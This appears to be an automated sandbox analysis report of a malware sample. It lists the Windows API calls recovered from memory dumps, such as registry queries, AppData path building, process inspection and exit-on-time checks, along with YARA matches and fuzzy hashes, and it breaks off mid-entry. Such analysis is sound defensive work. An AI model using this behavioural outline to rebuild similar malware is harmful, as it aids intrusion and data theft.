                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00507F31
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00507F60
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00507FA5
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00507FD3
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00508007
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 005080BB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005080EA
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 00508102
                        • lstrlen.KERNEL32(00000000), ref: 00508140
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050816F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00511B72
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051184F
                          • Part of subcall function 00511820: lstrlen.KERNEL32(01026048), ref: 00511860
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 00511887
                          • Part of subcall function 00511820: lstrcat.KERNEL32(00000000,00000000), ref: 00511892
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 005118C1
                          • Part of subcall function 00511820: lstrlen.KERNEL32(00524FA0), ref: 005118D3
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 005118F4
                          • Part of subcall function 00511820: lstrcat.KERNEL32(00000000,00524FA0), ref: 00511900
                          • Part of subcall function 00511820: lstrcpy.KERNEL32(00000000,00000000), ref: 0051192F
                        • sscanf.NTDLL ref: 00511B9A
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511BB6
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00511BC6
                        • ExitProcess.KERNEL32 ref: 00511BE3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                        • String ID:
                        • API String ID: 3040284667-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00513166
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051316D
                        • RegOpenKeyExA.ADVAPI32(80000002,0102BA48,00000000,00020119,?), ref: 0051318C
                        • RegQueryValueExA.ADVAPI32(?,0103D308,00000000,00000000,00000000,000000FF), ref: 005131A7
                        • RegCloseKey.ADVAPI32(?), ref: 005131B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1D5
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F89CD
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: invalid string position$string too long
                        • API String ID: 2002836212-4289949731
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8883
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 84d473eaa4a915f887f26e893fab7ef0f753363b0545721cacc24f942b77c7ff
                        • Instruction ID: d2c24228d9dcea9f0a3d106c489baee197486ae4a15d5763af54aea879b7f846
                        • Opcode Fuzzy Hash: 84d473eaa4a915f887f26e893fab7ef0f753363b0545721cacc24f942b77c7ff
                        • Instruction Fuzzy Hash: E631B7B5E005199BCB08DF58C891AAEBBB6EB88350F14826DE905DF384DB34AD01CB95
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515922
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515935
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_std::exception::exception
                        • String ID: Sec-WebSocket-Version: 13$string too long
                        • API String ID: 1928653953-3304177573
                        • Opcode ID: 1245b2244951634c13fadc2d7022583c2b479b6ecf370d36cb82aa8086ca8f8a
                        • Instruction ID: 186a70226671ae5c1edf5f627a9166bf3a2a52d7c8567eb2e7c1e35e4dee7f1e
                        • Opcode Fuzzy Hash: 1245b2244951634c13fadc2d7022583c2b479b6ecf370d36cb82aa8086ca8f8a
                        • Instruction Fuzzy Hash: 54115231304B50CBE7329B2CE801B597FE1BBD2761F250A5EE0D187695E771D881CBA6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0051A430,000000FF), ref: 00513D20
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00513D27
                        • wsprintfA.USER32 ref: 00513D37
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 5fa6b371e404821138300a4ac55fc4c27b556cd3e44181eb865362b60a8f29fa
                        • Instruction ID: 3274deda597443161aa3893570d63278485eb6ea5959fb7a2d3814cbf99c0064
                        • Opcode Fuzzy Hash: 5fa6b371e404821138300a4ac55fc4c27b556cd3e44181eb865362b60a8f29fa
                        • Instruction Fuzzy Hash: B601C071640318BBE7305B54DC4AF6ABB78FB45B61F048115FB05972D0DBB81901C6AA
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 004F8737
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 728223a93955a3e65dba8dd33622e377afacf7a841f8237ec4a970af6aa10be2
                        • Instruction ID: 1092e63517ca28004251d510a11f0a78216ca33ab2f3e43639c2bb7a5be1b44f
                        • Opcode Fuzzy Hash: 728223a93955a3e65dba8dd33622e377afacf7a841f8237ec4a970af6aa10be2
                        • Instruction Fuzzy Hash: 32F0F033B000260F8304743D8D851AFA88766E139033AC72AEA0AEF399DC34EC8285D8
                        APIs
                          • Part of subcall function 0051781C: __mtinitlocknum.LIBCMT ref: 00517832
                          • Part of subcall function 0051781C: __amsg_exit.LIBCMT ref: 0051783E
                        • ___addlocaleref.LIBCMT ref: 00518756
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$XuR$xtR
                        • API String ID: 3105635775-2045896750
                        • Opcode ID: 57ed8a800c3efcfb5f0147b2cbac3a978e04f6f3926c81c4b6519ab469276020
                        • Instruction ID: 8c0172e976cee078effffb583bc67c6c9533c92abf5843d6bcadad348e3f914c
                        • Opcode Fuzzy Hash: 57ed8a800c3efcfb5f0147b2cbac3a978e04f6f3926c81c4b6519ab469276020
                        • Instruction Fuzzy Hash: 20016171585B05EAE720AF79984D78AFFE0BF95320F20890DE0D5572E1CBB4A584CB50
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E581
                        • lstrcat.KERNEL32(?,0103D148), ref: 0050E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: cb3c3369ce74c024f62f625e411d73770b0a6217be2e7d01d23dffcd86e014ba
                        • Instruction ID: 6b7579c839ca3ae068fe88a5e5d08be36d47bc49219c3f142dc3adde764b7f5d
                        • Opcode Fuzzy Hash: cb3c3369ce74c024f62f625e411d73770b0a6217be2e7d01d23dffcd86e014ba
                        • Instruction Fuzzy Hash: B351EAB5A1010CABDB64EB54DC43EFE377DFB48300F44449DBA0587281DE759E858BA5
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00511FDF, 00511FF5, 005120B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: da75cb584d2cde1db556506dd999e5517b2d11ca9e0ceeb7c2a02807b866801f
                        • Instruction ID: d49595b0bc74a480b06a30eb5c69fcb8e7ce59aaa9c0779e9cec45686bbc0b69
                        • Opcode Fuzzy Hash: da75cb584d2cde1db556506dd999e5517b2d11ca9e0ceeb7c2a02807b866801f
                        • Instruction Fuzzy Hash: 15217C395101898FEB20EB36D44C7DDFB67FF88361F948656C8180B2C1E33219AAD796
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0050EBF1
                        • lstrcat.KERNEL32(?,0103E098), ref: 0050EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 02d1d1d322f62b99a4072d0bf335c18f1c589b6f49097b4cd2aada6440ddd527
                        • Instruction ID: 9c8e94254a6290db221ba01f43ad50ed2f0310f2ef22cf2c1819770d4aca6ca4
                        • Opcode Fuzzy Hash: 02d1d1d322f62b99a4072d0bf335c18f1c589b6f49097b4cd2aada6440ddd527
                        • Instruction Fuzzy Hash: 2431B471E1011D9BCB21EB64DD42BFD77B4FF48300F1444A9BB0697280DE74AE858B98
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00514492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 005144AD
                        • CloseHandle.KERNEL32(00000000), ref: 005144B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 005144E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 907ae56a716848e1e47ef047a057777f4c3f00976d4bed02376501d1a14136f2
